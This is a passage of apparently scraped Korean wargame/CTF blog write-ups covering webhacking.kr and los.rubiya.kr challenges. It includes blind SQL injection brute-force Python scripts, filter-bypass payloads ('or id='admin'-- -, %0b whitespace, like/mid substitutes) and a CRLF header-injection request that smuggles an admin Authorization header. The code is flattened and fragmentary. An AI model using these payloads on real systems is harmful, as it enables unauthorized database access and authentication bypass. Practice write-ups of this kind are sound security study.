var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;= 540
https://webhacking.kr/challenge/js-2/?getFlag로 가자
keyCode가 124일때 풀린다.
| 를 누르면 풀린다.
7809297.1
| los.rubiya.kr - giant (0) | 2021.08.29 |
|---|---|
| los.rubiya.kr - bugbear (0) | 2021.08.29 |
| los.rubiya.kr - darkknight (0) | 2021.08.29 |
| webhacking.kr - 52 (0) | 2021.08.25 |
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
%20 %09 %0a %0b %0c %0d %a0 /**/
이 중 쓰면 되는데
%20은 스페이스바
%09는 \t(tab)
%0a는 \n(LF Line Feed)
%0b는 버티컬 탭(Vertical Tab)
%0c는 폼 피드(Form Feed)
%0d는 \r(CR Carriage Return)
스페이스바, \t, \n, \r 를 필터링 하고, 1글자로만 써야 하므로 /**/도 쓰면 안된다.
그래서 %0b, %0c를 쓸 수 있다.
| webhacking.kr - 14, 15, 16, 17 (1) | 2021.08.29 |
|---|---|
| los.rubiya.kr - bugbear (0) | 2021.08.29 |
| los.rubiya.kr - darkknight (0) | 2021.08.29 |
| webhacking.kr - 52 (0) | 2021.08.25 |
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
import requests
pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "bugbear_19ebf8c8106a5323825b5dfa1b07ac1f"
code = '0||id%0ain%0a("admin")'
space = '%0a'
andsign = '%26%26'
equal = 'in'
_substr = 'mid'
_ascii = 'ord'
length = 0
print("find length")
for i in range(1, 32):
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}length(pw){space}{equal}{space}({str(i)})'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
length = i
print(i)
break;
print("find password")
for i in range(1, length + 1):
for j in range(32, 128):
ch = chr(j).replace('"', '\\"')
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code}{space}{andsign}{space}{_substr}(pw,{str(i)},1){space}{equal}{space}("{ch}")'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
breakord 빼버리고 그냥 문자열이랑 비교하고
비교는 in 으로 하고,
스페이스바는 \n 개행으로 하고
and와 or은 &&와 ||로 쓴다.
| webhacking.kr - 14, 15, 16, 17 (1) | 2021.08.29 |
|---|---|
| los.rubiya.kr - giant (0) | 2021.08.29 |
| los.rubiya.kr - darkknight (0) | 2021.08.29 |
| webhacking.kr - 52 (0) | 2021.08.25 |
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
import requests
pw = ""
cookie = {"PHPSESSID": "bs5vokabo2qae2ome4934v09gr"}
page = "darkknight_5cfbc71e68e09f1b039a8204d1a81456"
code = '0 or id like "admin"'
andsign = 'and'
equal = 'like'
_substr = 'mid'
_ascii = 'ord'
length = 0
print("find length")
for i in range(1, 32):
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code} {andsign} length(pw) {equal} {str(i)}'
print(url)
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
length = i
print(i)
break;
print("find password")
for i in range(1, length + 1):
for j in range(32, 128):
url = f"https://los.rubiya.kr/chall/{page}.php?no=" + \
f'{code} {andsign} {_ascii}({_substr}(pw,{str(i)},1)) {equal} {str(j)}'
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
breaksubstr은 mid 쓰고 ascii는 ord 쓰고, =는 like 쓰면 풀린다.
| los.rubiya.kr - giant (0) | 2021.08.29 |
|---|---|
| los.rubiya.kr - bugbear (0) | 2021.08.29 |
| webhacking.kr - 52 (0) | 2021.08.25 |
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
| rubiya - golem (0) | 2021.08.18 |
admin 페이지에서 로그인 취소하고 view source를 클릭하면 소스를 볼 수 있는데
<?php
include "config.php";
if($_GET['view_source']) view_source();
if($_GET['logout'] == 1){
$_SESSION['login']="";
exit("<script>location.href='./';</script>");
}
if($_SESSION['login']){
echo "hi {$_SESSION['login']}<br>";
if($_SESSION['login'] == "admin"){
if(preg_match("/^172\.17\.0\./",$_SERVER['REMOTE_ADDR'])) echo $flag;
else echo "Only access from virtual IP address";
}
else echo "You are not admin";
echo "<br><a href=./?logout=1>[logout]</a>";
exit;
}
if(!$_SESSION['login']){
if(preg_match("/logout=1/",$_SERVER['HTTP_REFERER'])){
header('WWW-Authenticate: Basic realm="Protected Area"');
header('HTTP/1.0 401 Unauthorized');
}
if($_SERVER['PHP_AUTH_USER']){
$id = $_SERVER['PHP_AUTH_USER'];
$pw = $_SERVER['PHP_AUTH_PW'];
$pw = md5($pw);
$db = dbconnect();
$query = "select id from member where id='{$id}' and pw='{$pw}'";
$result = mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']){
$_SESSION['login'] = $result['id'];
exit("<script>location.href='./';</script>");
}
}
if(!$_SESSION['login']){
header('WWW-Authenticate: Basic realm="Protected Area"');
header('HTTP/1.0 401 Unauthorized');
echo "Login Fail";
}
}
?>sql injection이 가능하고, login페이지는 admin으로 로그인 했을때 내부 아이피이면 플래그를 출력하고 아니면 Only access from virtual IP address 를 띄운다.
일단 admin'-- - 를 이용하여 admin으로 로그인을 해보면
내부 아이피로 접속해야 한다.
프록시 페이지에서 요청을 보낼 수 있다. 근데 path 만 넣을 수 있는데 캐니지 리턴을 이용해서 데이터를 조작할 수 있다.
/ HTTP/1.1\nA:
를 하게 되면
GET / HTTP/1.1
A: HTTP/1.1
Host: webhacking.kr:10008
Connection: Close
가 될 것이다.
이걸 이용해
요청 헤더에 Authorization: Basic YWRtaW4nLS0gLTo= 를 넣고 admin 페이지로 접속시킬 것이다.
/admin/ HTTP/1.1%0d%0aCookie: PHPSESSID=47bcmmnalsgr0onf8vh1bg86ot%0d%0aAuthorization: Basic YWRtaW4nLS0gLTo=%0d%0aA:
플래그가 나온다.
| los.rubiya.kr - bugbear (0) | 2021.08.29 |
|---|---|
| los.rubiya.kr - darkknight (0) | 2021.08.29 |
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
| rubiya - golem (0) | 2021.08.18 |
| rubiya - skeleton (0) | 2021.08.18 |
블라인드 sql을 해야 하는데 or과 and는 ||와 &&를 쓰면 되고, =와 substr이 막혀있다.
=는 like를 대신 쓰면 되고, substr은 mid를 대신 쓰면 된다.
"?pw='||id like 'admin' %26%26 ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- -"
import requests
pw = ""
cookie = {"PHPSESSID": "49jle25ne50oqi47t3s3klmn0e"}
page = "golem_4b5202cfedd8160e73124b5234235ef5"
for i in range(1, 9):
for j in range(32, 128):
url = "https://los.rubiya.kr/chall/"+page+".php?pw=' || id like 'admin' %26%26 ascii(mid(pw,"+str(i)+",1)) like "+str(j)+"-- -"
res = requests.get(url, cookies=cookie)
if "Hello admin" in res.text:
pw += chr(j)
print(pw)
break;77d6290b 인걸 알 수 있다.
| webhacking.kr - 52 (0) | 2021.08.25 |
|---|---|
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
| rubiya - skeleton (0) | 2021.08.18 |
| rubiya - vampire (0) | 2021.08.18 |
| dreamhack.io - simple_sqli (0) | 2021.08.18 |
뒤에 and 1=0이 달려있는데 그냥 'or id='admin' 넣고 뒤에는 주석처리 하면 된다.
'or id='admin'-- -
| dreamhack.io - web-ssrf (0) | 2021.08.25 |
|---|---|
| rubiya - golem (0) | 2021.08.18 |
| rubiya - vampire (0) | 2021.08.18 |
| dreamhack.io - simple_sqli (0) | 2021.08.18 |
| csrf-2 (0) | 2021.08.18 |